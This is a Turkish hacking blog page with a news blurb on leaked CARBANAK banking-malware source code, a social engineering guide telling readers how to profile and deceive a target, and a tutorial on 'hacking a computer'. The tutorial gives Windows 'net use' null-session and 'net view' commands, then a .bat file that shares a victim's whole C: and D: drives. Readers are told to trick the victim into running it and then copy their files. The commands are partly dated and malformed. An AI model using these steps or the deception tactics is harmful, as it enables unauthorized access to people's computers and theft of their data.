CARBANAK Kaynak Kodları İfşa Edildi!

Siber güvenlik uzmanlarının yaptığı araştırmalar sonucunda özellikle finans kuruluşlarını hedefleyen CARBANAK olarak bilinen kötü amaçlı yazılımın kaynak kodları ortaya çıktı.Carbanak kimi zaman FIN7,Anunak yada Cobalt olarak da adlandırılan APT türünde bankacılık işlemleri için yazılan kötü amaçlı yazılımdır.

FireEye'den siber güvenlik uzmanları CARBANAK kaynak kodunun tam 100.000 satır olduğunu ve 755 dosyadan oluştuğunu belirtti.FireEye'deki siber güvenlik araştırmacıları CARBANAK kaynak kodunu tersine mühendislik ile analizler sonucunda keşfettiklerini söyledi.CARBANAK tekrardan çalışmaya başlatılırsa, sahte hesaplara para transferi başlatabilen özelliği olan bir yazılım.


Sosyal Mühendislik Nedir? | Sosyal Mühendislik Nasıl Yapılır?

Günümüzün en net hackleme yöntemi olara kullanılan sosyal mühendislik kavramını ele alacağımz.Siber güvenlik alanında oldukça popüler olarak sosyal mühendislik saldırıları popülerliğini korumaya devam ediyor.

Sosyal Mühendislik Nedir?

Sosyal Mühendislik, bilgisayar sistemlerinin yetki dışında olan erişimleri elde etmek amacı ile gizli dosyaları ve ya bilgilere ulaştırma sanatıdır diyebiliriz.Hacklerin olduça çok fazla kullandığı hilelerden birisidir.Ünlü Hacker olan Kevin D.Mitnick yazmış olduğu Aldatma Sanatı kitabını kesinlikle okumanızı tavsiye ediyorum.

Sosyal Mühendislik Saldırıları Püf Noktaları

  1. Sosyal Mühendislik yapacağınız zaman amaç para olmamalı.Ulaşılması zor olan durumlarda hacklemek istediğiniz sisteme kolayca bir şekilde erişmektir.
  2. Sosyal Mühendis olabilmeniz için çok bilgiye ihdiyaç olmadan, kendinizin hayal ettiğiniz bir çok sisteme yetkisiz girişi yani hackleyebilirsiniz.

Sosyal Mühendislik Planları Neler?

  1. Bilgi Toplama:Hacklemek istediğiniz kişinin detayları bir analizini çıkartmanız da fayda var.Bunlar kesin olarak kurbanın yakın arkadaşları, web siteleri, hangi alana odaklı, hobileri nelerdir vb bilgiler saldırı yapılmadan önce toplanmalıdır.
  2. Planlı Saldırı:Bir saldırı yapacaksanız o saldırı için önceden plan yapmanız da fayda var.
  3. Saldırı Araçları:Saldıracağınız kişiye odaklı programlar sizlere saldırı aşamasında oldukça kolaylık sağlayacaktır.Bir saldırıya başlamadan önce ihdiyaçlarınızı belirlemenizde fayda olacaktır.
  4. Bilgileri Yararlı Kullanma:Hedef kişiyi bilgi toplamada elde ettiğiniz verileri, nerede kullanacağınız çok önemli bir husustur.Bir çok sosyal mühendislik saldırılarının arasında topladığınız bilgiler ve şifre tahminleriniz oldukça yararlı olacaktır.

Sosyal Mühendislik Bulunması Gereken Özellikler Neledir?

  1. Her zaman ikna gücü yeteneği geliştirilmiştir.
  2. Karşı tarafı nasıl etkileyeceğini geliştirmiştir.
  3. Ne kadar çok bilgili olur ise olsun karşı tarafa bu kadar çok bilgili olduğunu asla göstermezler
  4. Hedef kişiye nasıl saldıracaklarının senaryolarını hayal etme ve oluşturma yeteneği olduça yüksektir.

 


Bilgisayar Hackleme? | Bilgisayar Nasıl Hacklenir?

Günümüzün teknoloji çağı günler geçtikçe yeniliklerini göstermeye devam ediyor.Bilgisayar üreten firmaların, kullandıkları işletim sistemlerini farklılık gösterdiğini biliyoruz.Peki işletim sistemlerinde ki zaafiyetleri kullanarak bir bilgisayarı nasıl hackleriz?

Her yeni işletim sistemlerinde gelen güncellemeler ile birlikte farklı farklı zaafiyetlerde beraberinde gelmektedir.İşletim sistemi zaafiyetlerini kullanarak bilgisayar hackleme nasıl yapılır? Akılda kalan soru işaretlerine yazımızın ilerleyen bölümlerinde bilgilerini size vereceğim.

Bilgisayar hacklemek için sizlere 3 yöntemden bahsedeceğim.Windows tarafında terminal ekranı dediğimiz "CMD" ile doğan zaafiyetlerden faydalanarak bir bilgisayarı nasıl hackleyebiliriz?

  1. Bilgisayarın Null açığını kullanarak sızabiliriz.Fakat yapacaklarınız kısıtlanmıştır.
  2. Karşı tarafın bilgisayarı dosya paylaşımına açık ise tüm bilgilerini kendi bilgisayarımıza kopyalayabiliriz.
  3. Bilgisayarı tamamen kontrol altına alabilir, ve her komut ile hacklediğiniz bilgisayarı yönlendirebiliriz.

Eğer ki iki numarada ki işlem üzerinden devam edersek hacklemek istediğiniz bilgisayar için sizlere vereceğim adımları uygularsanız kesin sonuç alabilirsiniz.Aşağıda sizlere vermiş olduğum kodu "CMD" ekranına kopyalayıp enter tuşuna basınız.

  • net use \\192.168.1.1\\ipc$\\u:"" "" 

Eğer ki komut dönütü başarılı ise karşı tarafın bilgisayarında ki tüm bilgileri kendi bilgisayarınıza kopyalayabilirsiniz demektir.Yukarıda ki kodun ip kısmına hacklemek istediğiniz bilgisayar ip adresini yazınız.Komut başarılı dönütünden daha sonra aşağıda ki kodu tekrar cmd ekranına yapıştırın.

  • net view \\192.168.1.1

Yukarıda ki kod ise bağlantı kurduktan daha sonra tüm bilgisayarın içerisinde ki dosyaları görüntüleme kodudur.

Tüm bu aşamaları tamamladıktan daha sonra  aşağıda ki vereceğim kod satırını, not defterini kopyalayın.Daha sonra farklı kaydet diyerek herhangi bir yere .bat olarak kayıt edin.Oluşturmuş olduğunuz bu dosyayı hacklemek istediğiniz kişiye sosyal mühendislik yardımı ile gönderin.

  • net share hacker=c:\ /unlimited /remark:"RockStar"
  • net share hacker=d:\ /unlimited /remark:"RockStar"

Eğer ki oluşturmuş olduğunuz .bat dosyasını karşı taraf açmış ise bilgisayarında ki tüm dosyaları artık kopyalayabilirsiniz.Dosyayı açmış olduğunu kontrol etmek için aşağıda vereceğim kodu tekrar cmd üzerine yapıştırın.

  • net view \\[bağlandığınız ip]
     

Eğer ki komut başarılı dönütü alır iseniz artık tüm bilgilerini kopyalayabilirsiniz.Tüm bilgilerini kopyalamak için kodu aşağıda ki tekrardan cmd üzerine yapıştırın ve enter basın.

  • copy \\192.168.1.1\c\matrix.bat C:\ or /
     

Sizlere bu yazımızda bilgisayar nasıl hacklenir, bilgisayar hacklemek sorularını yanıt bulmaya çalıştık.Diğer yazılarımızı inceleyemeyi unutmayın.

 

 


İlginizi Çekebilecek Yazılar